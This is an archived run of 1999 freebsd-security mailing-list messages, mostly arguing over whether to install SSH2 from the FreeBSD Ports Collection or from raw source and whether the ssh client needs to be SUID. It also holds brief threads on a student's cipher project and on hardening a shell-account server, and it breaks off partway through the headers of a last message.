id TAA15493; Thu, 3 Jun 1999 19:36:10 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id TAA78135; Thu, 3 Jun 1999 19:36:09 +0200 (MET DST) Date: Thu, 3 Jun 1999 19:36:09 +0200 From: Eivind Eklund To: Unknow User Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990603193609.H77195@bitbox.follo.net> References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu> <375690E3.4BC9BB94@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <375690E3.4BC9BB94@tdnet.com.br>; from Unknow User on Thu, Jun 03, 1999 at 02:27:47PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 03, 1999 at 02:27:47PM +0000, Unknow User wrote: > No, i never use ports (Due to security problem)! > i always get the source! > > Any tips? Ports are *better* than getting the source manually, as they (often) include extra security patches, while still allowing you to access the source before compiling it. They also provide (some) protection against trojan horses. Now, go install the port, and think a tiny bit more before deciding your security policy the next time, OK? Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:37:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id F27C2159AA for ; Thu, 3 Jun 1999 10:37:44 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id KAA59582; Thu, 3 Jun 1999 10:37:32 -0700 (PDT) (envelope-from mph) Date: Thu, 3 Jun 1999 10:37:31 -0700 From: Matthew Hunt To: Unknow User Cc: freebsd-security@freebsd.org Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990603103731.G58665@wopr.caltech.edu> References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu> <375690E3.4BC9BB94@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <375690E3.4BC9BB94@tdnet.com.br>; from Unknow User on Thu, Jun 03, 1999 at 02:27:47PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 03, 1999 at 02:27:47PM +0000, Unknow User wrote: > No, i never use ports (Due to security problem)! > i always get the source! The ports get the source, apply patches, and build the source. You can easily read the patches and see if there's anything you don't like. As the patches are much smaller than the source, it shouldn't be a burden. > Any tips? Yes. Take advantage of the fact that dozens of people have invested thousands of hours to make ssh2 and thousands of other applications work well on FreeBSD. Take advantage of the fact that the exact problem you're having is one that we have already solved. Use the Ports Collection, or at least read the patches which address exactly the problem you're having. -- Matthew Hunt * UNIX is a lever for the http://www.pobox.com/~mph/ * intellect. -J.R. Mashey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:41: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 0DCF7155DC for ; Thu, 3 Jun 1999 10:40:56 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: from tdnet.com.br [200.236.148.203] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A0DDDE0076; Thu, 03 Jun 1999 14:52:29 -0300 Message-ID: <375693C1.68C59211@tdnet.com.br> Date: Thu, 03 Jun 1999 14:40:01 +0000 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: Bill Fumerola Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill Fumerola wrote: > Manually apply the patch or use the source and figure it out for yourself. > > Stop doing things the hard way just for a false sense of security. ^^^^^^^^^^^^^^^^^^^^^^^ The problem is that we never now what SUID, port will install! It happens that other has the same "false sense of security" i have: Look this: http://www.freebsd.org/~jkb/howto.html -- "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:42:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from euphoria.confusion.net (euphoria.confusion.net [209.63.19.10]) by hub.freebsd.org (Postfix) with ESMTP id 403F315571 for ; Thu, 3 Jun 1999 10:42:35 -0700 (PDT) (envelope-from stuyman@euphoria.confusion.net) Received: from euphoria.confusion.net (euphoria.confusion.net [209.63.19.10]) by euphoria.confusion.net (8.9.3/8.9.2) with SMTP id KAA22931; Thu, 3 Jun 1999 10:42:23 -0700 (PDT) Date: Thu, 3 Jun 1999 10:42:23 -0700 (PDT) From: Larry Berland To: Adam Shostack Cc: security@FreeBSD.ORG Subject: Re: Not freebsd related...yet In-Reply-To: <19990603085644.A24954@weathership.homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 3 Jun 1999, Adam Shostack wrote: > On Wed, Jun 02, 1999 at 08:48:36PM -0400, Laurence Berland wrote: > | I'm writing a new encryption algorithm for my computer science final > | project. Although it doesnt need to be particularly great I'm thinking > | there's no reason it's gotta be bad. I'm building a symmetric algorithm > | that is designed to specifically handle large keys ie >1024 bytes. If > | anyone has any hints or suggestions, I'm open to them...in fact that's > | why I'm writing this in the first place. If it works well, maybe > | someday people will actually use it, then again maybe not. thanks for > | your time. > > Actually, this will be 1. broken, and 2. uninteresting. I'd be happy > to bet money if it wasn't a sucker bet. > > 1. Building a cipher with a large key is hard. See the first twofish > paper, where Schneier et al, discuss the difficulty of building a key > schedule to effectively use long keys. Getting 1024 BYTES of > randomness is next to impossible, so your implementors will end up > expanding a smaller pool of randomness into a large key. Given that > this is unavoidable, you should anticipate it in your design, and have > a key expansion phase. That you didn't know this is worrisome. > I do know I need key expansion, I'm in the process of trying to decide how to implement it. Also, it should read 1024 bits not bytes, sorry for that. I've further scaled down to 512 bits anyway. > 2. Building a system to use more resources than current systems, and > expecting resource consumption to make it interesting is silly. > > If you want an interesting project, may I suggest trying to > cryptanalyze one of the AES candidates? Its more interesting, will > teach you a bunch, and may produce something useful. > I would, but the project was to code something new, not analyze something. I suppose I could've built some silly game like everyone else, but I wanted to try something different. > Sorry to flame, but this really isn't a good use of your time. > > Adam > Agreed, it's a waste of time, and don't worry about flaming,I'm expecting it. It's really just for the sake of seeing how far I can get. I doubt I'll finish any time before when I graduate college (in 5 or 6 years > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:45:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id E847A1555B for ; Thu, 3 Jun 1999 10:45:43 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id KAA59726; Thu, 3 Jun 1999 10:45:21 -0700 (PDT) (envelope-from mph) Date: Thu, 3 Jun 1999 10:45:21 -0700 From: Matthew Hunt To: Unknow User Cc: Bill Fumerola , freebsd-security@freebsd.org Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990603104521.I58665@wopr.caltech.edu> References: <375693C1.68C59211@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <375693C1.68C59211@tdnet.com.br>; from Unknow User on Thu, Jun 03, 1999 at 02:40:01PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 03, 1999 at 02:40:01PM +0000, Unknow User wrote: > The problem is that we never now what SUID, port will install! > It happens that other has the same "false sense of security" i have: You smoke crack. How do you know what SUID binaries any software will install? You read the source! You can do exactly the same for the Ports Collection. It's all plain English (or at least plain Makefile) for your perusal. You even get a nice listing of what files were installed, so you can examine them yourself. Most source tarballs do not provide that information. I think you need to learn how the Ports Collection works before you condemn it. You clearly do not understand it all. I also think it's odd that you think we would introduce security risks into software deliberately. I mean, we're the same people who can and do change the rest of FreeBSD. Presumably you trust us to do that right, or have you read all of /usr/src? If I wanted to introduce a security hole, I'd bury it somewhere in the FreeBSD userland, not in ports, to make sure everyone got it. Sheesh. -- Matthew Hunt * UNIX is a lever for the http://www.pobox.com/~mph/ * intellect. -J.R. Mashey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:47:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id BDB35159A9 for ; Thu, 3 Jun 1999 10:47:19 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id NAA01840; Thu, 3 Jun 1999 13:49:48 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Thu, 3 Jun 1999 13:49:48 -0400 (EDT) From: Bill Fumerola To: Unknow User Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <375693C1.68C59211@tdnet.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 3 Jun 1999, Unknow User wrote: > The problem is that we never now what SUID, port will install! > It happens that other has the same "false sense of security" i have: > > Look this: http://www.freebsd.org/~jkb/howto.html That file references the port, what are you talking about? And go see http://www.FreeBSD.org/~billf/ssh-from-ports.html - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:50:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.intercom.com (mail.intercom.com [206.98.165.10]) by hub.freebsd.org (Postfix) with ESMTP id 0E8F315976 for ; Thu, 3 Jun 1999 10:50:09 -0700 (PDT) (envelope-from jason@intercom.com) Received: from mail.intercom.com (mail.intercom.com [206.98.165.10]) by mail.intercom.com (8.9.0/8.9.0) with ESMTP id NAA09607 for ; Thu, 3 Jun 1999 13:50:04 -0400 (EDT) Date: Thu, 3 Jun 1999 13:50:04 -0400 (EDT) From: "Jason J. Horton" To: freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <19990603103731.G58665@wopr.caltech.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anyone run into the problem that SSH2 on a 3.1-RELEASE system will not allow a non-root user to log in? Root can log in fine, but any standard user cannot. When I enable telnet and ftp, standard users can log in fine, but no ssh. -Jason J. Horton Head Busboy Intercom Online Inc. 212.378.2202 | http://www.intercom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 11: 3:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 1FAAE14CFF for ; Thu, 3 Jun 1999 11:03:08 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id LAA24109; Thu, 3 Jun 1999 11:02:14 -0700 (PDT) Message-ID: <19990603110213.B19566@best.com> Date: Thu, 3 Jun 1999 11:02:14 -0700 From: "Jan B. Koum " To: Bill Fumerola , Unknow User Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) References: <375690E3.4BC9BB94@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Bill Fumerola on Thu, Jun 03, 1999 at 01:38:26PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 03, 1999 at 01:38:26PM -0400, Bill Fumerola wrote: > On Thu, 3 Jun 1999, Unknow User wrote: > > > No, i never use ports (Due to security problem)! > > i always get the source! > > > > Any tips? > > Manually apply the patch or use the source and figure it out for yourself. > > Stop doing things the hard way just for a false sense of security. Ports will install ssh client suid, where I am 99% sure you don't need the client to be suid. I always do '--disable-suid-ssh' when rolling out new ssh. Most of the software can be tweaked to be more secure during the build time .. sudo can be tweaked to switch to non-root user by default, for example. (So you can create user 'blah' to which people can _only_ sudo and hence work in a sandbox of a single user). -- yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 11:10:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id 2F1E414CAC for ; Thu, 3 Jun 1999 11:10:33 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id LAA60304; Thu, 3 Jun 1999 11:09:57 -0700 (PDT) (envelope-from mph) Date: Thu, 3 Jun 1999 11:09:57 -0700 From: Matthew Hunt To: "Jan B. Koum " Cc: Bill Fumerola , Unknow User , freebsd-security@freebsd.org Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990603110957.C59847@wopr.caltech.edu> References: <375690E3.4BC9BB94@tdnet.com.br> <19990603110213.B19566@best.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <19990603110213.B19566@best.com>; from Jan B. Koum on Thu, Jun 03, 1999 at 11:02:14AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 03, 1999 at 11:02:14AM -0700, Jan B. Koum wrote: > Ports will install ssh client suid, where I am 99% sure you don't > need the client to be suid. I always do '--disable-suid-ssh' when rolling > out new ssh. Why does it build SUID as shipped? What are the implications of installing it otherwise? The port can certainly be changed, if the Right Way is with --disable-suid-ssh. In any case, anyone can add --disable-suid-ssh to the CONFIGURE_ARGS line of the port Makefile, and still derive the benefit of the login.conf patches, pkg_delete, and so forth. It seems that the original poster isn't even willing to just apply the appropriate patch from the port to solve his problem. I really do not understand the confusion that is at work here. Matt -- Matthew Hunt * Inertia is a property http://www.pobox.com/~mph/ * of matter. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 11:12:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 7500D15293 for ; Thu, 3 Jun 1999 11:12:48 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id MAA28789; Thu, 3 Jun 1999 12:12:13 -0600 (MDT) Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.3/8.9.1) id MAA62390; Thu, 3 Jun 1999 12:12:13 -0600 (MDT) (envelope-from danderse@cs.utah.edu) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Thu, 3 Jun 1999 12:12:13 -0600 (MDT) From: "David G. Andersen" To: Matthew Hunt Cc: "Jan B. Koum " , Bill Fumerola , Unknow User , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: Matthew Hunt's message of Thu, June 3 1999 <19990603110957.C59847@wopr.caltech.edu> References: <375690E3.4BC9BB94@tdnet.com.br> <19990603110213.B19566@best.com> <19990603110957.C59847@wopr.caltech.edu> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14166.50513.861526.155312@torrey.cs.utah.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It's SUID so it can obtain the local host private key, for authentication to the remote machine. This is necessary if you use ssh with .rhosts/.shosts functionality. If you don't care about this functionality, then you don't need it to be suid. -Dave Lo and Behold, Matthew Hunt said: > On Thu, Jun 03, 1999 at 11:02:14AM -0700, Jan B. Koum wrote: > > > Ports will install ssh client suid, where I am 99% sure you don't > > need the client to be suid. I always do '--disable-suid-ssh' when rolling > > out new ssh. > > Why does it build SUID as shipped? What are the implications of > installing it otherwise? The port can certainly be changed, if the > Right Way is with --disable-suid-ssh. > > In any case, anyone can add --disable-suid-ssh to the CONFIGURE_ARGS > line of the port Makefile, and still derive the benefit of the login.conf > patches, pkg_delete, and so forth. > > It seems that the original poster isn't even willing to just apply > the appropriate patch from the port to solve his problem. I really > do not understand the confusion that is at work here. > > Matt > > -- > Matthew Hunt * Inertia is a property > http://www.pobox.com/~mph/ * of matter. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah http://www.angio.net/ Computer Science - Flux Research Group "What's footnote FIVE?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 11:18:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id E16A814C1F for ; Thu, 3 Jun 1999 11:18:24 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id LAA60549; Thu, 3 Jun 1999 11:17:46 -0700 (PDT) (envelope-from mph) Date: Thu, 3 Jun 1999 11:17:46 -0700 From: Matthew Hunt To: "David G. Andersen" Cc: "Jan B. Koum " , Bill Fumerola , Unknow User , freebsd-security@freebsd.org Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990603111746.A60419@wopr.caltech.edu> References: <375690E3.4BC9BB94@tdnet.com.br> <19990603110213.B19566@best.com> <19990603110957.C59847@wopr.caltech.edu> <14166.50513.861526.155312@torrey.cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <14166.50513.861526.155312@torrey.cs.utah.edu>; from David G. Andersen on Thu, Jun 03, 1999 at 12:12:13PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 03, 1999 at 12:12:13PM -0600, David G. Andersen wrote: > It's SUID so it can obtain the local host private key, for > authentication to the remote machine. This is necessary if you use > ssh with .rhosts/.shosts functionality. > > If you don't care about this functionality, then you don't need it to > be suid. Maybe it would be good if we keep the current behavior as a default, and add some sort of DISABLE_SUID option to the build? Yan, I'm not sure I like the comment on your web page advising people to avoid ports and packages. There's no reason to avoid the ports or packages if you're willing to spend a little time looking at them, like you have to with the source tarballs anyway, and by avoiding the ports you may miss out on FreeBSD enhancements, as is the case with ssh2. I would consider the login.conf patch to be security-related. By all means, if you have security concerns about specific ports, you should let us know! Matt -- Matthew Hunt * Stay close to the Vorlon. http://www.pobox.com/~mph/ * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 11:27:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail1.its.rpi.edu (mail1.its.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 66FA814D59 for ; Thu, 3 Jun 1999 11:27:18 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail1.its.rpi.edu (8.8.8/8.8.6) with ESMTP id OAA26094; Thu, 3 Jun 1999 14:26:46 -0400 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <375690E3.4BC9BB94@tdnet.com.br> References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu> Date: Thu, 3 Jun 1999 14:27:23 -0400 To: Unknow User , Matthew Hunt From: Garance A Drosihn Subject: Re: SSH2 (in FreeBSD-Questions) Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 2:27 PM +0000 6/3/99, Unknow User wrote: > No, i never use ports (Due to security problem)! > i always get the source! > > Any tips? Someone went to the time and trouble to fix all freebsd-related issues in ssh2, and you're just going to ignore that? Not only are you going to ignore that work, you're then going to complain about how the generally-available source does not happen to have freebsd-specific support in it? I'm not sure what your security hangup is with the ports collection, but the first tip I'd have is that you not complain after you have explicitly ignored work which people had already done to make your life easier. Even if you don't trust ports due to some security concern, there is nothing magic about what ports do. The second tip would be to look at the ssh2 information in ports, and do all steps yourself. You can ftp the files yourself, you can get the ports-related update file yourself, and you can figure out which of those updates you trust or don't trust by yourself. If you're going to ignore the work people did, then you're going to have to redo that work yourself. This should come as no surprise. --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 11:32:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail1.its.rpi.edu (mail1.its.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id ABDD814D59 for ; Thu, 3 Jun 1999 11:32:44 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail1.its.rpi.edu (8.8.8/8.8.6) with ESMTP id OAA193404; Thu, 3 Jun 1999 14:32:28 -0400 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <375693C1.68C59211@tdnet.com.br> References: Date: Thu, 3 Jun 1999 14:33:05 -0400 To: Unknow User From: Garance A Drosihn Subject: Re: SSH2 (in FreeBSD-Questions) Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 2:40 PM +0000 6/3/99, Unknow User wrote: >Bill Fumerola wrote: > >> Manually apply the patch or use the source and figure it out for yourself. >> >> Stop doing things the hard way just for a false sense of security. > ^^^^^^^^^^^^^^^^^^^^^^^ > >The problem is that we never now what SUID, port will install! >It happens that other has the same "false sense of security" i have: Yes, so instead of using the port collection, you went ahead and installed ssh2 without any freebsd-specific updates, and you were quite willing to run that program as super-user even though you clearly don't have a clue what it does, what it *needs* to do under Freebsd, or even what you are doing. This is known as a false sense of security. >The problem is that we never now what SUID, port will install! To answer this in another way, if you did know what you were doing, you would realize that the system checks for setuid programs every day, and sends email to root if some change occurs among setuid programs. You could monitor that email, and then you WOULD know what setuid programs were installed by a port. --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 13: 9: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from sfmailrelay.hamquist.com (sfmailrelay2.hamquist.com [199.108.89.15]) by hub.freebsd.org (Postfix) with SMTP id DC010159C6 for ; Thu, 3 Jun 1999 13:09:03 -0700 (PDT) (envelope-from rchilders@hamquist.com) Received: from 172.19.6.48 by sfmailrelay.hamquist.com with SMTP ( WorldSecure Server SMTP Relay(WSS) v3.2 SR1); Thu, 03 Jun 99 13:08:42 -0700 X-Server-Uuid: c29e0ff2-e8b9-11d1-a493-00c04fbbd7d3 Received: from hamquist.com ([172.19.6.230]) by sfmail.hamquist.com ( Netscape Messaging Server 3.6) with ESMTP id AAA3B0E; Thu, 3 Jun 1999 16:09:02 -0400 Message-ID: <3756E1C5.8C9A78CD@hamquist.com> Date: Thu, 03 Jun 1999 13:12:53 -0700 From: "Richard Childers" Organization: hambrecht & quist, llc X-Mailer: Mozilla 4.5 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: "Timothy R. Platt" Cc: Subject: Re: Shell Account system References: X-WSS-ID: 1B483F402722-01-02 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Timothy R. Platt" wrote: "Better install a traffic logger, or better yet ipfw." Could someone knowledgeable comment on the differences between ipfw and SANS' SHADOW package (primarily developed on a FreeBSd platform) ? -- richard "Timothy R. Platt" wrote: > > Install tripwire, it's in the ports. > > Better install a traffic logger, or better yet ipfw. You'll need them to > log and report all the smurfs, fraggles, and synks you're going to get. > > Tim > > >Yeah, thanks, but the system is for anyone able to pay, so, you can say > >i trust nobody. > > > >Kris Kennaway wrote: > >> > >> On Mon, 31 May 1999, Joe Gleason wrote: > >> > >> [Snip] > >> > >> Good advice, but running a shell account for people who you don't really > >>trust > >> is still not a wise move for the inexperienced, and not something you can > >> easily document in a webpage. UNIX security is a way of life - there are any > >> number of things which the unwary can trip over which could potentially > >> compromise your machine. > >> > >> If it's for a small group of users who you trust fairly well, you > >> probably should be okay, though. > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 19:23:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from kiev.sovam.com (relay.kiev.sovam.com [194.186.143.5]) by hub.freebsd.org (Postfix) with ESMTP id 5D07614C47 for ; Thu, 3 Jun 1999 19:23:08 -0700 (PDT) (envelope-from root@triton.kiev.sovam.com) Received: from [194.186.143.7] (helo=triton.kiev.sovam.com) by kiev.sovam.com with esmtp (Exim 2.12 #1) id 10pjda-00090L-00; Fri, 4 Jun 1999 05:23:14 +0300 Received: from root by triton.kiev.sovam.com with local (Exim 2.12 #1) id 10pjdS-0002VH-00; Fri, 4 Jun 1999 05:23:06 +0300 Received: from [206.184.139.137] (helo=shell6.ba.best.com) by kiev.sovam.com with esmtp (Exim 2.12 #1) id 10nsDS-000I9R-00 for doka@kiev.sovam.com; Sun, 30 May 1999 02:08:35 +0300 Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id QAA23069; Sat, 29 May 1999 16:08:17 -0700 (PDT) Message-ID: <19990529160817.B19679@best.com> Date: Sat, 29 May 1999 16:08:17 -0700 From: "Jan B. Koum " To: Vladimir Litovka , freebsd-security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990525000758.A14670@fw.garman.net> <199905250414.OAA03109@henry.cs.adfa.edu.au> <7ip5fv$2n98$3@news.kiev.sovam.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <7ip5fv$2n98$3@news.kiev.sovam.com>; from Vladimir Litovka on Sat, May 29, 1999 at 04:43:43PM +0000 Status: RO X-Status: X-Keywords: X-UID: 9991 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 04:43:43PM +0000, Vladimir Litovka wrote: > Warren Toomey wrote: > > Where are these sysctl's variables desribed? I didn't find them in man for > sysctl - there are small amount of variables... > > Thank you. > > -- > doka Smotri v source: vi /usr/src/sys/netinet/tcp_input.c -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 20:49:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id 3D06014D91 for ; Thu, 3 Jun 1999 20:49:46 -0700 (PDT) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (2007 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 3 Jun 1999 22:34:11 -0500 (CDT) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Thu, 3 Jun 1999 22:34:04 -0500 (CDT) From: James Wyatt To: Matthew Hunt Cc: Unknow User , Bill Fumerola , freebsd-security@freebsd.org Subject: Re: SSH2 (in FreeBSD-Questions) 